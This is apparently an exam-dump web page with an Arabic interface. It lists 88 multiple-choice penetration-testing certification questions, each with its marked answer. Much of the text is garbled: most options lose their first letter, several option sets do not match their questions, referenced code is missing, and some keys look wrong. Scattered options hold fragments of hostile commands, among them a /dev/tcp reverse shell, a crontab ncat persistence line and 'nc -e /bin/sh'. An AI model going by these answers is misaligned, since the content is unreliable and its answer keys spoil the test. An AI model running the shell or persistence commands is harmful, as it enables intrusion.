لا تريد أن تفوت شيئا؟

نصائح اجتياز امتحان الشهادة

آخر أخبار الامتحانات ومعلومات الخصم

برعاية وحديثة من قبل خبرائنا

نعم، أرسل لي النشرة الإخبارية

خذ اختبارات أخرى عبر الإنترنت
السؤال #1
A penetration tester has been contracted to review wireless security. The tester has deployed a malicious wireless AP that mimics the configuration of the target enterprise WiFi. The penetration tester now wants to try to force nearby wireless stations to connect to the malicious AP.Which of the following steps should the tester take NEXT?
A. ee explanation below
عرض الإجابة
اجابة صحيحة: A
السؤال #2
Deconfliction is necessary when the penetration test:
A. etermines that proprietary information is being stored in cleartext
B. ccurs during the monthly vulnerability scanning
C. ncovers indicators of prior compromise over the course of the assessment
D. roceeds in parallel with a criminal digital forensic investigation
عرض الإجابة
اجابة صحيحة: D
السؤال #3
A software company has hired a penetration tester to perform a penetration test on a database server. The tester has been given a variety of tools used by the company's privacy policy. Which of the following would be the BEST to use to find vulnerabilities on this server?
A. penVAS
B. ikto
C. QLmap
D. essus
عرض الإجابة
اجابة صحيحة: C
السؤال #4
A penetration tester has been given eight business hours to gain access to a client's financial system.Which of the following techniques will have the HIGHEST likelihood of success?
A. ttempting to tailgate an employee who is going into the client's workplace
B. ropping a malicious USB key with the company's logo in the parking lot
C. sing a brute-force attack against the external perimeter to gain a foothold
D. erforming spear phishing against employees by posing as senior management
عرض الإجابة
اجابة صحيحة: D
السؤال #5
A company hired a penetration-testing team to review the cyber-physical systems in a manufacturing plant. The team immediately discovered the supervisory systems and PLCs are both connected to the company intranet.Which of the following assumptions, if made by the penetration-testing team, is MOST likely to be valid?
A. LCs will not act upon commands injected over the network
B. upervisors and controllers are on a separate virtual network by default
C. ontrollers will not validate the origin of commands
D. upervisory systems will detect a malicious injection of code/commands
عرض الإجابة
اجابة صحيحة: C
السؤال #6
A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized:Which of the following commands should the penetration tester run post-engagement?
A. rep -v apache ~/bash_history > ~/
B. m -rf /tmp/apache
C. hmod 600 /tmp/apache
D. askkill /IM ג€apacheג€ /F
عرض الإجابة
اجابة صحيحة: B
السؤال #7
A penetration tester, who is doing an assessment, discovers an administrator has been exfiltrating proprietary company information. The administrator offers to pay the tester to keep quiet. Which of the following is the BEST action for the tester to take?
A. heck the scoping document to determine if exfiltration is within scope
B. top the penetration test
C. scalate the issue
D. nclude the discovery and interaction in the daily report
عرض الإجابة
اجابة صحيحة: C
السؤال #8
Which of the following tools would be MOST useful in collecting vendor and other security-relevant information for IoT devices to support passive reconnaissance?
A. hodan
B. map
C. ebScarab-NG
D. essus
عرض الإجابة
اجابة صحيحة: A
السؤال #9
A company has hired a penetration tester to deploy and set up a rogue access point on the network. Which of the following is the BEST tool to use to accomplish this goal?
A. ireshark
B. ircrack-ng
C. ismet
D. ifite
عرض الإجابة
اجابة صحيحة: B
السؤال #10
The results of an Nmap scan are as follows:Which of the following would be the BEST conclusion about this device?
A. larify the statement of work
B. btain an asset inventory from the client
C. nterview all stakeholders
D. dentify all third parties involved
عرض الإجابة
اجابة صحيحة: B
السؤال #11
The following line-numbered Python code snippet is being used in reconnaissance:Which of the following line numbers from the script MOST likely contributed to the script triggering a `probable port scan` alert in the organization's IDS?
A. ine 01
B. ine 02
C. ine 07
D. ine 08
E. ine 12
عرض الإجابة
اجابة صحيحة: A
السؤال #12
Which of the following is the MOST common vulnerability associated with IoT devices that are directly connected to the Internet?
A. nsupported operating systems
B. usceptibility to DDoS attacks
C. nability to network
D. he existence of default passwords
عرض الإجابة
اجابة صحيحة: D
السؤال #13
A penetration tester was conducting a penetration test and discovered the network traffic was no longer reaching the client's IP address. The tester later discovered the SOC had used sinkholing on the penetration tester's IP address.Which of the following MOST likely describes what happened?
A. he penetration tester was testing the wrong assets
B. he planning process failed to ensure all teams were notified
C. he client was not ready for the assessment to start
D. he penetration tester had incorrect contact information
عرض الإجابة
اجابة صحيحة: B
السؤال #14
A penetration tester has been given an assignment to attack a series of targets in the 192.168.1.0/24 range, triggering as few alarms and countermeasures as possible.Which of the following Nmap scan syntaxes would BEST accomplish this objective?
A. map -sT -vvv -O 192
B. map -sV 192
C. map -sA -v -O 192
D. map -sS -O 192
عرض الإجابة
اجابة صحيحة: D
السؤال #15
During a penetration test, a tester is able to change values in the URL from example.com/login.php?id=5 to example.com/login.php?id=10 and gain access to a web application. Which of the following vulnerabilities has the penetration tester exploited?
A. ommand injection
B. roken authentication
C. irect object reference
D. ross-site scripting
عرض الإجابة
اجابة صحيحة: C
السؤال #16
A physical penetration tester needs to get inside an organization's office and collect sensitive information without acting suspiciously or being noticed by the security guards. The tester has observed that the company's ticket gate does not scan the badges, and employees leave their badges on the table while going to the restroom. Which of the following techniques can the tester use to gain physical access to the office? (Choose two.)
A. lickjacking
B. ession hijacking
C. arameter pollution
D. ookie hijacking
E. ross-site scripting
عرض الإجابة
اجابة صحيحة: CD
السؤال #17
A security firm is discussing the results of a penetration test with the client. Based on the findings, the client wants to focus the remaining time on a critical network segment. Which of the following BEST describes the action taking place?
A. aximizing the likelihood of finding vulnerabilities
B. eprioritizing the goals/objectives
C. liminating the potential for false positives
D. educing the risk to the client environment
عرض الإجابة
اجابة صحيحة: B
السؤال #18
Which of the following assessment methods is MOST likely to cause harm to an ICS environment?
A. niff and then crack the WPS PIN on an associated WiFi device
B. ump the user address book on the device
C. reak a connection between two Bluetooth devices
D. ransmit text messages to the device
عرض الإجابة
اجابة صحيحة: A
السؤال #19
Which of the following is MOST important to include in the final report of a static application-security test that was written with a team of application developers as the intended audience?
A. xecutive summary of the penetration-testing methods used
B. ill of materials including supplies, subcontracts, and costs incurred during assessment
C. uantitative impact assessments given a successful software compromise
D. ode context for instances of unsafe typecasting operations
عرض الإجابة
اجابة صحيحة: D
السؤال #20
A penetration tester discovered a vulnerability that provides the ability to upload to a path via discovery traversal. Some of the files that were discovered through this vulnerability are:Which of the following is the BEST method to help an attacker gain internal access to the affected machine?
A. dit the discovered file with one line of code for remote callback
B. ownload
C. dit the smb
D. ownload the smb
عرض الإجابة
اجابة صحيحة: C
السؤال #21
A red team gained access to the internal network of a client during an engagement and used the Responder tool to capture important data.Which of the following was captured by the testing team?
A. ultiple handshakes
B. P addresses
C. ncrypted file transfers
D. ser hashes sent over SMB
عرض الإجابة
اجابة صحيحة: D
السؤال #22
HOTSPOT (Drag and Drop is not supported)You are a security analyst tasked with hardening a web server. You have been given a list of HTTP payloads that were flagged as malicious.INSTRUCTIONGiving the following attack signatures, determine the attack type, and then identify the associated remediation to prevent the attack in the future.If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.Hot Area:
A. ee Explanation section for answer
عرض الإجابة
اجابة صحيحة: A
السؤال #23
A penetration tester needs to upload the results of a port scan to a centralized security tool. Which of the following commands would allow the tester to save the results in an interchangeable format?
A. map -iL results 192
B. map 192
C. map -A 192
D. map 192
عرض الإجابة
اجابة صحيحة: C
السؤال #24
A penetration tester wants to validate the effectiveness of a DLP product by attempting exfiltration of data using email attachments. Which of the following techniques should the tester select to accomplish this task?
A. teganography
B. etadata removal
C. ncryption
D. ncode64
عرض الإجابة
اجابة صحيحة: A
السؤال #25
A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized:Which of the following commands should the penetration tester run post-engagement?
A. rep -v apache ~/bash_history > ~/
B. m -rf /tmp/apache
C. hmod 600 /tmp/apache
D. askkill /IM ?€apache?€ /F
عرض الإجابة
اجابة صحيحة: B
السؤال #26
Which of the following commands will allow a penetration tester to permit a shell script to be executed by the file owner?
A. hmod u+x script
B. hmod u+e script
C. hmod o+e script
D. hmod o+x script
عرض الإجابة
اجابة صحيحة: A
السؤال #27
A penetration tester who is conducting a vulnerability assessment discovers that ICMP is disabled on a network segment. Which of the following could be used for a denial-of-service attack on the network segment?
A. murf
B. ing flood
C. raggle
D. ing of death
عرض الإجابة
اجابة صحيحة: C
السؤال #28
Which of the following situations would MOST likely warrant revalidation of a previous security assessment?
A. fter detection of a breach
B. fter a merger or an acquisition
C. hen an organization updates its network firewall configurations
D. hen most of the vulnerabilities have been remediated
عرض الإجابة
اجابة صحيحة: B
السؤال #29
A penetration tester ran a ping `"A command during an unknown environment test, and it returned a 128 TTL packet. Which of the following OSs would MOST likely return a packet of this type?
A. indows
B. pple
C. inux
D. ndroid
عرض الإجابة
اجابة صحيحة: A
السؤال #30
A penetration tester ran the following commands on a Windows server:Which of the following should the tester do AFTER delivering the final report?
A. elete the scheduled batch job
B. lose the reverse shell connection
C. owngrade the svsaccount permissions
D. emove the tester-created credentials
عرض الإجابة
اجابة صحيحة: D
السؤال #31
A penetration tester wants to test a list of common passwords against the SSH daemon on a network device. Which of the following tools would be BEST to use for this purpose?
A. ashcat
B. imikatz
C. atator
D. ohn the Ripper
عرض الإجابة
اجابة صحيحة: C
السؤال #32
A new security firm is onboarding its first client. The client only allowed testing over the weekend and needed the results Monday morning. However, the assessment team was not able to access the environment as expected until Monday. Which of the following should the security company have acquired BEFORE the start of the assessment?
A. signed statement of work
B. he correct user accounts and associated passwords
C. he expected time frame of the assessment
D. he proper emergency contacts for the client
عرض الإجابة
اجابة صحيحة: D
السؤال #33
During a penetration-testing engagement, a consultant performs reconnaissance of a client to identify potential targets for a phishing campaign. Which of the following would allow the consultant to retrieve email addresses for technical and billing contacts quickly, without triggering any of the client's cybersecurity tools?(Choose two.)
A. OW
B. LA
C. OE
D. DA
عرض الإجابة
اجابة صحيحة: BC
السؤال #34
A penetration tester has completed an analysis of the various software products produced by the company under assessment. The tester found that over the past several years the company has been including vulnerable third-party modules in multiple products, even though the quality of the organic code being developed is very good. Which of the following recommendations should the penetration tester include in the report?
A. dd a dependency checker into the tool chain
B. erform routine static and dynamic analysis of committed code
C. alidate API security settings before deployment
D. erform fuzz testing of compiled binaries
عرض الإجابة
اجابة صحيحة: A
السؤال #35
An Nmap scan of a network switch reveals the following:Which of the following technical controls will most likely be the FIRST recommendation for this device?
A. ncrypted passwords
B. ystem-hardening techniques
C. ultifactor authentication
D. etwork segmentation
عرض الإجابة
اجابة صحيحة: B
السؤال #36
A penetration tester would like to obtain FTP credentials by deploying a workstation as an on-path attack between the target and the server that has the FTP protocol. Which of the following methods would be the BEST to accomplish this objective?
A. ait for the next login and perform a downgrade attack on the server
B. apture traffic using Wireshark
C. erform a brute-force attack over the server
D. se an FTP exploit against the server
عرض الإجابة
اجابة صحيحة: B
السؤال #37
Appending string values onto another string is called:
A. ompilation
B. onnection
C. oncatenation
D. onjunction
عرض الإجابة
اجابة صحيحة: C
السؤال #38
A compliance-based penetration test is primarily concerned with:
A. btaining PII from the protected network
B. ypassing protection on edge devices
C. etermining the efficacy of a specific set of security standards
D. btaining specific information from the protected network
عرض الإجابة
اجابة صحيحة: C
السؤال #39
A company hired a penetration tester to do a social-engineering test against its employees. Although the tester did not find any employees' phone numbers on the company's website, the tester has learned the complete phone catalog was published there a few months ago.In which of the following places should the penetration tester look FIRST for the employees' numbers?
A. eb archive
B. itHub
C. ile metadata
D. nderground forums
عرض الإجابة
اجابة صحيحة: A
السؤال #40
A company obtained permission for a vulnerability scan from its cloud service provider and now wants to test the security of its hosted data.Which of the following should the tester verify FIRST to assess this risk?
A. c 10
B. owershell -exec bypass -f \\\\10
C. ash -i >& /dev/tcp/10
D. get 10
عرض الإجابة
اجابة صحيحة: A
السؤال #41
Performing a penetration test against an environment with SCADA devices brings an additional safety risk because the:
A. evices produce more heat and consume more power
B. evices are obsolete and are no longer available for replacement
C. rotocols are more difficult to understand
D. evices may cause physical world effects
عرض الإجابة
اجابة صحيحة: D
السؤال #42
A penetration tester is attempting to discover live hosts on a subnet quickly.Which of the following commands will perform a ping scan?
A. map -sn 10
B. map -sV -A 10
C. map -Pn 10
D. map -sT -p- 10
عرض الإجابة
اجابة صحيحة: A
السؤال #43
A penetration tester was brute forcing an internal web server and ran a command that produced the following output:However, when the penetration tester tried to browse the URL http://172.16.100.10:3000/profile, a blank page was displayed.Which of the following is the MOST likely reason for the lack of output?
A. he HTTP port is not open on the firewall
B. he tester did not run sudo before the command
C. he web server is using HTTPS instead of HTTP
D. his URI returned a server error
عرض الإجابة
اجابة صحيحة: D
السؤال #44
A penetration tester downloaded a Java application file from a compromised web server and identifies how to invoke it by looking at the following log:Which of the following is the order of steps the penetration tester needs to follow to validate whether the Java application uses encryption over sockets?
A. un an application vulnerability scan and then identify the TCP ports used by the application
B. un the application attached to a debugger and then review the application's log
C. isassemble the binary code and then identify the break points
D. tart a packet capture with Wireshark and then run the application
عرض الإجابة
اجابة صحيحة: D
السؤال #45
A penetration tester finds a PHP script used by a web application in an unprotected internal source code repository. After reviewing the code, the tester identifies the following:Which of the following combinations of tools would the penetration tester use to exploit this script?
A. ydra and crunch
B. etcat and cURL
C. urp Suite and DIRB
D. map and OWASP ZAP
عرض الإجابة
اجابة صحيحة: B
السؤال #46
A penetration tester is explaining the MITRE ATT&CK framework to a company's chief legal counsel.Which of the following would the tester MOST likely describe as a benefit of the framework?
A. nderstanding the tactics of a security intrusion can help disrupt them
B. cripts that are part of the framework can be imported directly into SIEM tools
C. he methodology can be used to estimate the cost of an incident better
D. he framework is static and ensures stability of a security program over time
عرض الإجابة
اجابة صحيحة: A
السؤال #47
A penetration tester was hired to perform a physical security assessment of an organization's office. After monitoring the environment for a few hours, the penetration tester notices that some employees go to lunch in a restaurant nearby and leave their belongings unattended on the table while getting food. Which of the following techniques would MOST likely be used to get legitimate access into the organization's building without raising too many alerts?
A. ailgating
B. umpster diving
C. houlder surfing
D. adge cloning
عرض الإجابة
اجابة صحيحة: D
السؤال #48
Which of the following BEST describe the OWASP Top 10? (Choose two.)
A. dit the discovered file with one line of code for remote callback
B. ownload
C. dit the smb
D. ownload the smb
عرض الإجابة
اجابة صحيحة: AC
السؤال #49
A penetration tester has gained access to the Chief Executive Officer's (CEO's) internal, corporate email. The next objective is to gain access to the network.Which of the following methods will MOST likely work?
A. ry to obtain the private key used for S/MIME from the CEO's account
B. end an email from the CEO's account, requesting a new account
C. ove laterally from the mail server to the domain controller
D. ttempt to escalate privileges on the mail server to gain root access
عرض الإجابة
اجابة صحيحة: D
السؤال #50
When planning a penetration-testing effort, clearly expressing the rules surrounding the optimal time of day for test execution is important because:
A. security compliance regulations or laws may be violated
B. testing can make detecting actual APT more challenging
C. testing adds to the workload of defensive cyber- and threat-hunting teams
D. business and network operations may be impacted
عرض الإجابة
اجابة صحيحة: D
السؤال #51
When planning a penetration-testing effort, clearly expressing the rules surrounding the optimal time of day for test execution is important because:
A. ecurity compliance regulations or laws may be violated
B. esting can make detecting actual APT more challenging
C. esting adds to the workload of defensive cyber- and threat-hunting teams
D. usiness and network operations may be impacted
عرض الإجابة
اجابة صحيحة: D
السؤال #52
A security firm has been hired to perform an external penetration test against a company. The only information the firm received was the company name. Which of the following passive reconnaissance approaches would be MOST likely to yield positive initial results?
A. pecially craft and deploy phishing emails to key company leaders
B. un a vulnerability scan against the company's external website
C. untime the company's vendor/supply chain
D. crape web presences and social-networking sites
عرض الإجابة
اجابة صحيحة: D
السؤال #53
A company has recruited a penetration tester to conduct a vulnerability scan over the network. The test is confirmed to be on a known environment. Which of the following would be the BEST option to identify a system properly prior to performing the assessment?
A. sset inventory
B. NS records
C. eb-application scan
D. ull scan
عرض الإجابة
اجابة صحيحة: A
السؤال #54
A penetration tester wants to scan a target network without being detected by the client's IDS.Which of the following scans is MOST likely to avoid detection?
A. end deauthentication frames to the stations
B. erform jamming on all 2
C. et the malicious AP to broadcast within dynamic frequency selection channels
D. odify the malicious AP configuration to not use a preshared key
عرض الإجابة
اجابة صحيحة: C
السؤال #55
A penetration tester ran the following command on a staging server: python -m SimpleHTTPServer 9891Which of the following commands could be used to download a file named exploit to a target machine for execution?
A. c 10
B. owershell -exec bypass -f \\10
C. ash -i >& /dev/tcp/10
D. get 10
عرض الإجابة
اجابة صحيحة: D
السؤال #56
A penetration tester captured the following traffic during a web-application test:Which of the following methods should the tester use to visualize the authorization information being transmitted?
A. ecode the authorization header using UTF-8
B. ecrypt the authorization header using bcrypt
C. ecode the authorization header using Base64
D. ecrypt the authorization header using AES
عرض الإجابة
اجابة صحيحة: C
السؤال #57
A penetration tester was able to gain access successfully to a Windows workstation on a mobile client's laptop.Which of the following can be used to ensure the tester is able to maintain access to the system?
A. chtasks /create /sc /ONSTART /tr C:\\Temp|WindowsUpdate
B. mic startup get caption,command
C. rontab -l; echo ג€@reboot sleep 200 && ncat -lvp 4242 -e /bin/bashג€) | crontab 2>/dev/null
D. udo useradd -ou 0 -g 0 user
عرض الإجابة
اجابة صحيحة: A
السؤال #58
Which of the following should a penetration tester do NEXT after identifying that an application being tested has already been compromised with malware?
A. nalyze the malware to see what it does
B. ollect the proper evidence and then remove the malware
C. o a root-cause analysis to find out how the malware got in
D. emove the malware immediately
E. top the assessment and inform the emergency contact
عرض الإجابة
اجابة صحيحة: E
السؤال #59
A Chief Information Security Officer wants to evaluate the security of the company's e-commerce application. Which of the following tools should a penetration tester use FIRST to obtain relevant information from the application without triggering alarms?
A. QLmap
B. irBuster
C. 3af
D. WASP ZAP
عرض الإجابة
اجابة صحيحة: D
السؤال #60
A penetration tester is exploring a client's website. The tester performs a curl command and obtains the following:Which of the following tools would be BEST for the penetration tester to use to explore this site further?
A. urp Suite
B. irBuster
C. PScan
D. WASP ZAP
عرض الإجابة
اجابة صحيحة: C
السؤال #61
A company has hired a penetration tester to deploy and set up a rogue access point on the network.Which of the following is the BEST tool to use to accomplish this goal?
A. Wireshark
B. Aircrack-ng
C. Kismet
D. Wifite
عرض الإجابة
اجابة صحيحة: B
السؤال #62
A company obtained permission for a vulnerability scan from its cloud service provider and now wants to test the security of its hosted dat
A. hether sensitive client data is publicly accessible
B. hether the connection between the cloud and the client is secure
C. hether the client's employees are trained properly to use the platform
D. hether the cloud applications were developed using a secure SDLC
عرض الإجابة
اجابة صحيحة: A
السؤال #63
A new client hired a penetration-testing company for a month-long contract for various security assessments against the client's new service. The client is expecting to make the new service publicly available shortly after the assessment is complete and is planning to fix any findings, except for critical issues, after the service is made public. The client wants a simple report structure and does not want to receive daily findings.Which of the following is most important for the penetration tester to defin
A. stablish the format required by the client
B. stablish the threshold of risk to escalate to the client immediately
C. stablish the method of potential false positives
D. stablish the preferred day of the week for reporting
عرض الإجابة
اجابة صحيحة: B
السؤال #64
A penetration tester obtained the following results after scanning a web server using the dirb utility:Which of the following elements is MOST likely to contain useful information for the penetration tester?
A. ndex
B. bout
C. nfo
D. ome
عرض الإجابة
اجابة صحيحة: B
السؤال #65
A penetration tester has prepared the following phishing email for an upcoming penetration test:Which of the following is the penetration tester using MOST to influence phishing targets to click on the link?
A. amiliarity and likeness
B. uthority and urgency
C. carcity and fear
D. ocial proof and greed
عرض الإجابة
اجابة صحيحة: B
السؤال #66
Penetration-testing activities have concluded, and the initial findings have been reviewed with the client. Which of the following best describes the NEXT step in the engagement?
A. cceptance by the client and sign-off on the final report
B. cheduling of follow-up actions and retesting
C. ttestation of findings and delivery of the report
D. eview of the lessons during the engagement
عرض الإجابة
اجابة صحيحة: A
السؤال #67
A penetration tester recently performed a social-engineering attack in which the tester found an employee of the target company at a local coffee shop and over time built a relationship with the employee. On the employee's birthday, the tester gave the employee an external hard drive as a gift.Which of the following social-engineering attacks was the tester utilizing?
A. hishing
B. ailgating
C. aiting
D. houlder surfing
عرض الإجابة
اجابة صحيحة: C
السؤال #68
A company becomes concerned when the security alarms are triggered during a penetration test.Which of the following should the company do NEXT?
A. alt the penetration test
B. onduct an incident response
C. econflict with the penetration tester
D. ssume the alert is from the penetration test
عرض الإجابة
اجابة صحيحة: C
السؤال #69
A penetration tester gains access to a system and is able to migrate to a user process:Given the output above, which of the following actions is the penetration tester performing? (Choose two.)
A. he tester input the incorrect IP address
B. he command requires the ג€"port 135 option
C. n account for RDP does not exist on the server
D. owerShell requires administrative privilege
عرض الإجابة
اجابة صحيحة: CD
السؤال #70
Which of the following expressions in Python increase a variable val by one? (Choose two.)
A. map ג€"T3 192
B. map ג€"P0 192
C. map ג€"T0 192
D. map ג€"A 192
عرض الإجابة
اجابة صحيحة: CF
السؤال #71
A penetration tester runs the unshadow command on a machine.Which of the following tools will the tester most likely use NEXT?
A. John the Ripper
B. Hydra
C. Mimikatz
D. Cain and Abel
عرض الإجابة
اجابة صحيحة: A
السؤال #72
SIMULATIONYou are a penetration tester reviewing a client's website through a web browser.INSTRUCTIONSReview all components of the website through the browser to determine if vulnerabilities are present.Remediate ONLY the highest vulnerability from either the certificate, source, or cookies.If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
A. ee explanation below
عرض الإجابة
اجابة صحيحة: A
السؤال #73
A penetration tester has gained access to a network device that has a previously unknown IP range on an interface. Further research determines this is an always-on VPN tunnel to a third-party supplier.Which of the following is the BEST action for the penetration tester to take?
A. tilize the tunnel as a means of pivoting to other internal devices
B. isregard the IP range, as it is out of scope
C. top the assessment and inform the emergency contact
D. can the IP range for additional systems to exploit
عرض الإجابة
اجابة صحيحة: C
السؤال #74
A software company has hired a security consultant to assess the security of the company's software development practices. The consultant opts to begin reconnaissance by performing fuzzing on a software binary. Which of the following vulnerabilities is the security consultant MOST likely to identify?
A. Weak authentication schemes
B. Credentials stored in strings
C. Buffer overflows
D. Non-optimized resource management
عرض الإجابة
اجابة صحيحة: C
السؤال #75
Which of the following commands will allow a penetration tester to permit a shell script to be executed by the file owner?
A. hmod u+x script
B. hmod u+e script
C. hmod o+e script
D. hmod o+x script
عرض الإجابة
اجابة صحيحة: A
السؤال #76
A penetration tester discovers a web server that is within the scope of the engagement has already been compromised with a backdoor. Which of the following should the penetration tester do NEXT?
A. orensically acquire the backdoor Trojan and perform attribution
B. tilize the backdoor in support of the engagement
C. ontinue the engagement and include the backdoor finding in the final report
D. nform the customer immediately about the backdoor
عرض الإجابة
اجابة صحيحة: D
السؤال #77
A penetration tester downloaded the following Perl script that can be used to identify vulnerabilities in network switches. However, the script is not working properly.Which of the following changes should the tester apply to make the script work as intended?
A. hange line 2 to $ip= ג€10
B. emove lines 3, 5, and 6
C. emove line 6
D. ove all the lines below line 7 to the top of the script
عرض الإجابة
اجابة صحيحة: A
السؤال #78
A consulting company is completing the ROE during scoping.Which of the following should be included in the ROE?
A. ost of the assessment
B. eport distribution
C. esting restrictions
D. iability
عرض الإجابة
اجابة صحيحة: C
السؤال #79
A CentOS computer was exploited during a penetration test. During initial reconnaissance, the penetration tester discovered that port 25 was open on an internalSendmail server. To remain stealthy, the tester ran the following command from the attack machine:Which of the following would be the BEST command to use for further progress into the targeted network?
A. c 10
B. sh 10
C. c 127
D. sh 127
عرض الإجابة
اجابة صحيحة: C
السؤال #80
A penetration tester has obtained root access to a Linux-based file server and would like to maintain persistence after reboot. Which of the following techniques would BEST support this objective?
A. reate a one-shot system service to establish a reverse shell
B. btain /etc/shadow and brute force the root password
C. un the nc ג€"e /bin/sh <ג€¦> command
D. ove laterally to create a user account on LDAP
عرض الإجابة
اجابة صحيحة: A
السؤال #81
A penetration tester is starting an assessment but only has publicly available information about the target company. The client is aware of this exercise and is preparing for the test.Which of the following describes the scope of the assessment?
A. artially known environment testing
B. nown environment testing
C. nknown environment testing
D. hysical environment testing
عرض الإجابة
اجابة صحيحة: C
السؤال #82
A Chief Information Security Officer wants a penetration tester to evaluate whether a recently installed firewall is protecting a subnetwork on which many decades- old legacy systems are connected. The penetration tester decides to run an OS discovery and a full port scan to identify all the systems and any potential vulnerability. Which of the following should the penetration tester consider BEFORE running a scan?
A. he timing of the scan
B. he bandwidth limitations
C. he inventory of assets and versions
D. he type of scan
عرض الإجابة
اجابة صحيحة: C
السؤال #83
A penetration tester has prepared the following phishing email for an upcoming penetration test:Which of the following is the penetration tester using MOST to influence phishing targets to click on the link?
A. Familiarity and likeness
B. Authority and urgency
C. Scarcity and fear
D. Social proof and greed
عرض الإجابة
اجابة صحيحة: B
السؤال #84
A security company has been contracted to perform a scoped insider-threat assessment to try to gain access to the human resources server that houses PII and salary data. The penetration testers have been given an internal network starting position.Which of the following actions, if performed, would be ethical within the scope of the assessment?
A. xploiting a configuration weakness in the SQL database
B. ntercepting outbound TLS traffic
C. aining access to hosts by injecting malware into the enterprise-wide update server
D. everaging a vulnerability on the internal CA to issue fraudulent client certificates
E. stablishing and maintaining persistence on the domain controller
عرض الإجابة
اجابة صحيحة: A
السؤال #85
Which of the following web-application security risks are part of the OWASP Top 10 v2017? (Choose two.)
A. his device may be vulnerable to the Heartbleed bug due to the way transactions over TCP/22 handle heartbeat extension packets, allowing attackers to obtain sensitive information from process memory
B. his device is most likely a gateway with in-band management services
C. his device is most likely a proxy server forwarding requests over TCP/443
D. his device may be vulnerable to remote code execution because of a buffer overflow vulnerability in the method used to extract DNS names from packets prior to DNSSEC validation
عرض الإجابة
اجابة صحيحة: BE
السؤال #86
A penetration tester wants to identify CVEs that can be leveraged to gain execution on a Linux server that has an SSHD running.Which of the following would BEST support this task?
A. un nmap with the -O, -p22, and -sC options set against the target
B. un nmap with the -sV and -p22 options set against the target
C. un nmap with the --script vulners option set against the target
D. un nmap with the -sA option set against the target
عرض الإجابة
اجابة صحيحة: D
السؤال #87
A penetration tester is scanning a corporate lab network for potentially vulnerable services.Which of the following Nmap commands will return vulnerable ports that might be interesting to a potential attacker?
A. map 192
B. map 192
C. map 192
D. map 192
عرض الإجابة
اجابة صحيحة: C
السؤال #88
Which of the following documents describes specific activities, deliverables, and schedules for a penetration tester?
A. DA
B. SA
C. OW
D. OU
عرض الإجابة
اجابة صحيحة: C

عرض الإجابات بعد التقديم

يرجى إرسال البريد الإلكتروني الخاص بك والواتس اب للحصول على إجابات الأسئلة.

ملحوظة: يرجى التأكد من صلاحية معرف البريد الإلكتروني وWhatsApp حتى تتمكن من الحصول على نتائج الاختبار الصحيحة.

بريد إلكتروني:
رقم الواتس اب/الهاتف:


Copyright © 2024. Designer by SPOTO Official Website. All Rights Reserved.